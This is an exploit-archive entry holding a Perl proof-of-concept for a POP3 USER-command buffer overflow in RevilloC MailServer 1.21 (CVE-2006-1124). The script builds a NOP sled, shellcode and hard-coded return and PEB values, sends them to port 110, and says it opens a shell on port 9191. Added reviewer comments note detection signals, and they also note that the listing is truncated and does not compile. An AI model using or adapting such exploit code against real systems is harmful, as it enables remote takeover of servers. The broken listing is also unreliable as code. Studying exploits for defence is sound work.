RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow

Related Vulnerabilities: CVE-2006-1124  
Publish Date: 07 Mar 2006
                #!/usr/bin/perl -w    
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered by securma massine from MorX Security Research Team (
#RevilloC is a MailServer and Proxy v 1.21 (
#The mail server is a central point for emails coming in and going out from  home or office
#The service will work with any standard email client that supports POP3 and SMTP.  
#The overflow is triggered by sending a large buffer after the USER command
#C:\>nc 110
#+OK RevilloC POP3 Ready
#USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#7C92B3FB   8B0B     MOV ECX,DWORD PTR DS:[EBX]  --->EBX points to  "\xdd"x4
#ECX   dddddddd
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for educational, testing and demonstration purposes only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w     	  
use IO::Socket;
                     # Proof-of-concept for the POP3 USER overflow described in the header:
                     # it builds one oversized USER line and sends it to TCP port 110 of the
                     # host given as the first command-line argument.
                     # NOTE(review): this listing is incomplete as published. The argument
                     # check below has no block braces and the payload string is cut off,
                     # so the script does not compile in this form.
                     # Defender's view: RFC 1939 limits each POP3 argument to 40 characters,
                     # so a USER line of several kilobytes is a reliable length-based
                     # detection signal on port 110. The header records no vendor patch, so
                     # exposure has to be reduced by restricting access to the service.
                     if ($#ARGV<0) 
                         print "\n write the target IP!! \n\n"; 

        # Payload bytes. Only the first 16 bytes survive on this page; the trailing
        # '.' shows that the rest of the string was lost.
        $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
                # 3601 bytes of 0x90 (the x86 NOP opcode) used as filler ahead of the payload.
                $buffer = "\x90"x3601;
                # Four hard-coded bytes appended after the payload. The author's
                # "change if needed" suggests the value is target-specific.
                # NOTE(review): the header names both XP SP1 and SP2; confirm which build applies.
                $eax ="\x83\xb5\x19\x01"; # change if needed             
                # Second hard-coded four-byte value; the author labels it "PEB lock".
                $peb= "\x20\xf0\xfd\x7f"; #PEB lock
                # POP3 command prefix (note the two spaces) and the CRLF line terminator.
                $user ="USER  ";
                $enter  = "\x0d\x0a";
                # TCP connection to the POP3 port (110) on the host in $ARGV[0]; dies on failure.
                $connect = IO::Socket::INET ->new (Proto=>"tcp",
	      PeerAddr=> "$ARGV[0]",
	      PeerPort=>"110"); unless ($connect) { die "cant connect" }  
                # Banner output. $text is never assigned anywhere in this listing, so that
                # print emits only a newline (and an uninitialized-value warning under -w).
                print "\nRevilloC mail server remote PoC exploit by securma massine\n";
                print "\nsecurma\\n";
                print "\\n";              
                print "$text\n";
                # The status line is printed before the data is actually sent.
                print "[+] Sent USER\n";
                # One send: "USER  " + filler + payload + the two 4-byte values + CRLF.
                # No server reply is read, so the script cannot tell whether the target was affected.
                $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); 
	      # The message implies the payload is meant to open a listener on TCP 9191.
	      # NOTE(review): not verifiable from the truncated bytes. For responders, an
	      # unexpected listener on 9191 on a mail host is an indicator worth checking.
	      print "[+] Sent shellcode..telnet to victim host port 9191\n";

# [2006-03-07]